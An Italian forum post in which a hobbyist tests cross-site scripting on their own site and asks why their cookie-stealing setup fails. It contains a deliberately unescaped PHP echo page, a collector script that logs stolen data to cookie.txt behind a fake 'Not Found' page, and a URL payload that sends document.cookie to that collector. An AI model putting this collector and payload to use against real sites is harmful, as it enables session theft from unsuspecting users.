Avendo la passione per la sicurezza informatica leggendo un testo dulle XSS (Cross Site Scripting) ho deciso di testarle.

Oggi ho provato a testare sul mio sito il cookie stealing attraverso il Cross Site Scripting.

Ho quindi creato una pagina web sul mio sito, xss.php.

Ho inserito questo codice php:

<?php
$var = $_GET['message'];
echo "$var";
?>


Che DOVREBBE essere bugguto e vulnerabile da XSS in quanto non c'è un controllo sul carattere <.

Ho quindi creato un altra pagina: sitomaligno.php

con questo codice:

<html>
<head>
<title>prova</title>
</head><body>
<h1>Not Found</h1>
<?php
$data = $_GET['data'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, "$data"."\n");
fclose($fh);
?>


dovrei averti rubato i cookie</p>
</body></html>


Adesso se non sbaglio dal momento che la vittima andasse qua:
http://theninjateam.altervista.org/h...t/xss/xss.php?<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data=" + document.cookie</script>

Dovrei avergli rubato i cookie.
Ma tutto cio' non funziona.
Mi direte: "ovvio che non rubi i cookie... non gliel'hai dati..."

Ma non mi si forma alcun file cookie.txt quando se ne dovrebbe formare uno vuoto...

Il bello è che quando vado nel link http://theninjateam.altervista.org/h...t/xss/xss.php?<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data=" + document.cookie</script> non mi carica nemmeno la pagina sitomaligno.php...

Cos'ho sbagliato?